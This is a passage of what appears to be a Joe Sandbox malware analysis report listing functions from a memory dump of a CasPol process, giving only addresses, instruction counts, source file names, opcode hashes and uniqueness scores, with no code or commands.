                                                                                  • Instruction ID: d2cd9d6c855633715cee8db41fc3f480e8520dffb1128621ab73aae3eba4d0f3
                                                                                  • Opcode Fuzzy Hash: ca15b753e28b8432ce671ff25814f13c948caf61a21a5d5eca6f2e524fab5d9b
                                                                                  • Instruction Fuzzy Hash: 3F01F77190821ACFC701DFA0DE8249DB7B6FF81310B90C656C5558F2D5E7309947C792
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DEFA7 Relevance: .0, Instructions: 35COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 44449939b60d9de1ffc67e373b726494b835e58fcb459f29d6031bfd946dc2a3
                                                                                  • Instruction ID: a25fda29e00b4bbdcb2d92432711aefc57064b4ce92c658d6957a656792bdd53
                                                                                  • Opcode Fuzzy Hash: 44449939b60d9de1ffc67e373b726494b835e58fcb459f29d6031bfd946dc2a3
                                                                                  • Instruction Fuzzy Hash: 4201B035A01228CFCBA5EF60D8986CAB779BF46315F1081E9D90AA3340CB319A85CF42
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DD7B6 Relevance: .0, Instructions: 29COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 82e55e0b74922948448e42d05d48b04b28b54925a7286f239031e7881e7792a5
                                                                                  • Instruction ID: 3a32cc22067d54557c0393f64697e61e5b70ff1736b1cb2ccaf31e00e79283c7
                                                                                  • Opcode Fuzzy Hash: 82e55e0b74922948448e42d05d48b04b28b54925a7286f239031e7881e7792a5
                                                                                  • Instruction Fuzzy Hash: C9F0A032B40224CBCB149B7094783AD73B6FB84329F208468E502CB384DF76CC12CB45
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DEFF1 Relevance: .0, Instructions: 28COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e80bee449e7cae294048fdd7964daa27ad40b709798e693c914c3f95ce4e4157
                                                                                  • Instruction ID: 69f8e4474482c8844fd4d8349838c75c54df40733cf3ab630293ae6561aee892
                                                                                  • Opcode Fuzzy Hash: e80bee449e7cae294048fdd7964daa27ad40b709798e693c914c3f95ce4e4157
                                                                                  • Instruction Fuzzy Hash: A9F01435A00228CFCB64DF60D8886C9B774FF45305F2081EAD90AA3340CB319E84CF52
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3D5BE1 Relevance: .0, Instructions: 24COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 872baaaba0dc13b2ee6168b30aaf52795c93a8b2e2d30669831141349b454c33
                                                                                  • Instruction ID: 575bde925220b9bade7971673a59e2041b96a02b303fbb9558fd2e821b5b3e2b
                                                                                  • Opcode Fuzzy Hash: 872baaaba0dc13b2ee6168b30aaf52795c93a8b2e2d30669831141349b454c33
                                                                                  • Instruction Fuzzy Hash: 98E0D87610C3449BCB029B70A1200C97BB07F436143954D99D4858F653CB33FA0B8BE6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3D4BAF Relevance: .0, Instructions: 23COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2406dd647578f8f920c075a36900bc01af82dbbcb3ac90545d1ab77e8730209c
                                                                                  • Instruction ID: b50b46ba5b71df32a272b41976531beaa2572972b7b310ba168d35a094a96a43
                                                                                  • Opcode Fuzzy Hash: 2406dd647578f8f920c075a36900bc01af82dbbcb3ac90545d1ab77e8730209c
                                                                                  • Instruction Fuzzy Hash: D5E04F3581410D8BCF04EBA0FC7A0FDBF7CFA12226B80025DDD0E52192DA311669CA91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DF03B Relevance: .0, Instructions: 21COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bb0a45e7f20d8745d57ebbc6cc36f121c790a9118db84daf7cf51146ab4217a0
                                                                                  • Instruction ID: 64f72cbae5ef92723c9fffb66fc71afaa53a864d9f90dc8bfa08ad2e750e885c
                                                                                  • Opcode Fuzzy Hash: bb0a45e7f20d8745d57ebbc6cc36f121c790a9118db84daf7cf51146ab4217a0
                                                                                  • Instruction Fuzzy Hash: C8F0F235E00228CFCB25DF64D8886C9B774FF48305F1085EADA0AA3240CB719E808F41
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3D5470 Relevance: .0, Instructions: 19COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 002ebe8ccd4c3a0280ec5d0df00efd44e980b4e67bb82ad6c8e0a19ee64cff21
                                                                                  • Instruction ID: 59e374d59f0637c5ef9bce9d39d058c2579c38773d82d0e00c6d420699a53979
                                                                                  • Opcode Fuzzy Hash: 002ebe8ccd4c3a0280ec5d0df00efd44e980b4e67bb82ad6c8e0a19ee64cff21
                                                                                  • Instruction Fuzzy Hash: 02E0C23AD04218CBCB00DB80D4AA6DCB7B5FB89376F10806AD91A63291C7322D11CF51
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3D0C40 Relevance: .0, Instructions: 16COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f87be3ad2a9a6790d74163c88205e9a5a17b6761edf78e5bae85bfed013de80a
                                                                                  • Instruction ID: 0e0749cbab3f660723dd8196317392188f4f9453e23e4e7319600974b93b8ebf
                                                                                  • Opcode Fuzzy Hash: f87be3ad2a9a6790d74163c88205e9a5a17b6761edf78e5bae85bfed013de80a
                                                                                  • Instruction Fuzzy Hash: 14D0C7750B115887D7103F64D94D7A8377CEB51647F501670E096D0491DF50E4C6D963
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3D5BF0 Relevance: .0, Instructions: 15COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0f7403843a8039af9774b1b3b0b996cc7757e4ccfc9f766fc38a67243cff42ac
                                                                                  • Instruction ID: 5652faf98a9db6ec9958d23b927b1148d87ec3eb0cfe9160d2609fbfd91ee861
                                                                                  • Opcode Fuzzy Hash: 0f7403843a8039af9774b1b3b0b996cc7757e4ccfc9f766fc38a67243cff42ac
                                                                                  • Instruction Fuzzy Hash: 79D05EB2208308CBCB00AFA5D05145E77B5AF866183A58E6CD14A9F216DF73F8078FD6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3D4BC0 Relevance: .0, Instructions: 15COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5ce9a9fe0c1ff9569ccc07c6f412e1bee2cba9c75367a6123ff7d8331eb1d103
                                                                                  • Instruction ID: 5bda57e2b4edd8a0a3d7e0451d168cf72ed1a16dc93c2460c7f6898b4811ec2d
                                                                                  • Opcode Fuzzy Hash: 5ce9a9fe0c1ff9569ccc07c6f412e1bee2cba9c75367a6123ff7d8331eb1d103
                                                                                  • Instruction Fuzzy Hash: 30D01230804119CBCB08AB94D47A4BDBB3CEB11251F80405DD90E52191DA32155ACEC1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3D0C50 Relevance: .0, Instructions: 10COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 32af9936955916d398d4566078cfa7d05a1662d69ba1fe363cc03d362208bf6b
                                                                                  • Instruction ID: f5bd76af783efa4834f3edec8adaeb1f83291e2038a688af9cc50406b3cde07c
                                                                                  • Opcode Fuzzy Hash: 32af9936955916d398d4566078cfa7d05a1662d69ba1fe363cc03d362208bf6b
                                                                                  • Instruction Fuzzy Hash: CDC08C30041224CBC7103FA4D88D3A83B78FF40387B000530E00680091DF60D8C0DEA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3D5212 Relevance: .0, Instructions: 6COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f3d02b0e3d3fe8250b54e478911994ae273882a622db66be78a1f5a6f5692dc8
                                                                                  • Instruction ID: 4762ed46e19356f9de8ca1a8e575c1e0ee65e78326016d02a41c783af8415907
                                                                                  • Opcode Fuzzy Hash: f3d02b0e3d3fe8250b54e478911994ae273882a622db66be78a1f5a6f5692dc8
                                                                                  • Instruction Fuzzy Hash: 0BB0123150400DC7C7088AC0D46503CB738F783251B400288D90D11480CA221C608B81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%